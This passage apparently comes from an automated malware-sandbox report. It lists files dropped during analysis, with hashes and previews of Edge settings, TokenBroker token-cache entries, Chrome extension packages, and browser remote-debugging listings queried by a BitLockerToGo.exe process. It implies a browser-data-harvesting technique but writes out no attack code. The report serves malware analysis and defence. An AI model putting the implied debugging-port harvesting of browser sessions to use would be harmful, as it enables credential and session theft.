                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\bad73ab8-d79e-4d4c-a32c-053dbbd2cc90.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):46027
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.088242508551804
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3MkbJrT8IeQcrQgxXSMLmZikZ8QUoD+PJ3xIAB3lWC1o/wWE7RTupzKscDX//Nq0:3Mk1rT8HRXIZahTWIo/oRTuiv
                                                                                                                                                                                                                                                                                                                  MD5:32D65C982E8C8D255AAF15F297AEDD24
                                                                                                                                                                                                                                                                                                                  SHA1:BDA247F9E42074600BDE4F0CECDFDC199C86CB15
                                                                                                                                                                                                                                                                                                                  SHA-256:DF3114275BCFBB2B3821F68D704120377E717D0DFED8095918583CB56E767925
                                                                                                                                                                                                                                                                                                                  SHA-512:88CEBECEEB8862CD89A1CC075014FD681C203673CF7BA17CEA1A3F969E03F209E970A5447A352578DC773A5A13A7EC02444AC3A8236A1ADB48F2FEBF32B2FD17
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"67a26cfe-80a1-4053-b539-2c7a1a13978d"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8529679235276326
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxtxl9Il8ufVdeUJ+CxS7K3lmB1i+OC3d+kPd1rc:moY52UJbwWVmB1i+OC3d+h
                                                                                                                                                                                                                                                                                                                  MD5:2F302F522BACFF2F4DD233CEDD345220
                                                                                                                                                                                                                                                                                                                  SHA1:CC853AB9BE77D676C65CB6274CFDD176C74FF52D
                                                                                                                                                                                                                                                                                                                  SHA-256:EDC7AF4590C96B37F1CBECF8D969575D5C2E5F4CFC359CDE9861D46BACB7A73F
                                                                                                                                                                                                                                                                                                                  SHA-512:088AA15A951270F0E1C800773211BE588333C09DE1439C6FC05A4375F31BB76D4A7E165BAD1493E2A6BCC87878D0BE91EE57DEB5D08A922D0B1AF06C0E375457
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.B.6.V.0.S.w.8.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.n.s.q.h.a.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.000221175765321
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:xY5q5GbZwIkZoGPLWXHOREGuwqDcSGJwz9+:xvGbTkZo8KXsgwqHf+
                                                                                                                                                                                                                                                                                                                  MD5:58BE9C440FB5A6C5241D1BF068122533
                                                                                                                                                                                                                                                                                                                  SHA1:D4154375150765EC0039419657848027ABCFE033
                                                                                                                                                                                                                                                                                                                  SHA-256:86D19E0E509C316551E5B29B626A64082A9456CED20D96C3267848FADE032498
                                                                                                                                                                                                                                                                                                                  SHA-512:592538F73182E89653D3284FA1346EBC7BD6ACE356B1B5D33322D281F6F1E459526765E10DA446629AAF06CE1548C28ADDF22B46774A5710EE043EA4946379E4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.B.E.Z.t.y.Q.8.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.n.s.q.h.a.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9054035432478864
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xMxl9Il8uf7XuAghvQJ/7ITdj+9P0md/vc:aWY57X4pkTITR+9PQ
                                                                                                                                                                                                                                                                                                                  MD5:2877997F28D7EBFC3C52529DD2CB2B80
                                                                                                                                                                                                                                                                                                                  SHA1:382E07E73AB69102BF215E209D44EE269C39A39E
                                                                                                                                                                                                                                                                                                                  SHA-256:BB814501C537843B26228B9380D15AD7111480667B8EB9BB958B93F12C913647
                                                                                                                                                                                                                                                                                                                  SHA-512:0D6A2367723412ABC2D022EAC19E9250D208E716BE9C006B796DA9170C3AB9029EB8ABD22E93B13F014EA7B61635D9338E4ED17DB414BF8F255E83757E7AF1C5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".r.Z.P.Y.5.v.V.a.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.n.s.q.h.a.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\json[1].json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1267
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.376908478154887
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:OBfNaoCqYm/EINePKllDCqNBfNaoCHMtTMhBYpDCHMjBfNaoCNy0hyT1UCN8o1:SfNaoCbwETECcfNaoCsWKCsdfNaoCgL/
                                                                                                                                                                                                                                                                                                                  MD5:716AF03E88B4B360BFC26F0392DB7E2A
                                                                                                                                                                                                                                                                                                                  SHA1:0182997CB3A6E610B5832CDD6EAC2CBA543231A1
                                                                                                                                                                                                                                                                                                                  SHA-256:CAB4DB47A0D2B997923DC39DF2720DD74537C693CC37E8802D51DC3D4AD69066
                                                                                                                                                                                                                                                                                                                  SHA-512:606CCC5F0CF95E4162B76A4CDE16F9E1C13FE6B0535279B30F53FB308DDAAEDFBFA895FAF94E81857F899CA0411789BAD99BD72848773C37DD52317DAFD66CC0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/136890C3CB3C22B1F8F85A64F6F3244E",.. "id": "136890C3CB3C22B1F8F85A64F6F3244E",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/136890C3CB3C22B1F8F85A64F6F3244E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/F1BE003B15A0CD641D77E0D8756383F0",.. "id": "F1BE003B15A0CD641D77E0D8756383F0",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/F1BE003B15A0CD641D77E0D8756383F0"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\json[1].json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3500
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4003600134759004
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:6NnCSHC2NnC8bCgNnCQ9CWNnCldgECWNnCDQ6yCDQVNnCsDCDNnCUwCpNnCERqRj:6NFN9NXN+dNbNbeNl3NrRqRDRl
                                                                                                                                                                                                                                                                                                                  MD5:A9181CF4D195139E093AE6E57EFD74D1
                                                                                                                                                                                                                                                                                                                  SHA1:5B2A69CD49DDE4DCC8FFA500204A0AD96F380081
                                                                                                                                                                                                                                                                                                                  SHA-256:A88812EB062CF61DF84B0523DDD63196CA23FF90450E3126BDFFA3845F0DA117
                                                                                                                                                                                                                                                                                                                  SHA-512:9C938BA398669F47778590074A25B35F7BF80FFE29D209E9D6921DF22C704506C85C0B4AEAC755C7F5DDC125658403D1A9476F99CAF45CEDFD60EEDB51BE29E4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A2A60B0EEA2A5D86E1EBCF387615E61D",.. "id": "A2A60B0EEA2A5D86E1EBCF387615E61D",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A2A60B0EEA2A5D86E1EBCF387615E61D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/8967B13CDFC13528FD69229073E78899",.. "id": "8967B13CDFC13528FD69229073E78899",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/8967B13CDFC13528FD69229073E78899"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\349308d4-d913-4fb1-8120-2bdb9b32ada5.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1920x1080, components 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):261407
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.936690818812815
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:d5M6xLTOzxmsLGFj4Xwz+aASlmhxL4MSZ5fPl9k:d5M6dTOzo2X5Sox1U5l9k
                                                                                                                                                                                                                                                                                                                  MD5:8CE49C2A304876D50ADEB333B6D26474
                                                                                                                                                                                                                                                                                                                  SHA1:2D4126C8B8372E8F203DC6972F6D24F5392C5373
                                                                                                                                                                                                                                                                                                                  SHA-256:4FDBB021158861AB6D02ADE017AB6BD93C151FA97BC3FB491471E34D8798EA72
                                                                                                                                                                                                                                                                                                                  SHA-512:7123F730AC0DCAF5922F379940B164B1C8A73E403FED4072231D64FBC2D6F5A503B17E3A05EEA0A80100AC41CEA9A35F65C5BDF78EA6BF237D7BBF1E007F2BB2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b75a62fc-b0e7-2542-abb1-0cf1051812b8" xmpMM:DocumentID="xmp.did:C653DEED17A311EA8B5BD5250E05F029" xmpMM:InstanceID="xmp.iid:C653DEEC17A311EA8B5BD5250E05F029" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:39d3d013-cb07-b94a-9afe-3e232046b219" stRef:documentID="adobe:docid:photoshop:2052e8c3-076c-2b43-8d50-84f2df243b9c"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................O..............

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\8feeb957-1525-4e4a-9802-2369efbf71ba.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9ca71cd0-7423-4e94-9276-77d189273c12.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):138356
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                                  MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                                  SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                                  SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                                  SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\c76ee082-9bc5-43e5-a8c2-cc146e78d3f8.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\c8eca8f8-af66-4438-bdca-65ccc494d0a2.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                  Malicious:false
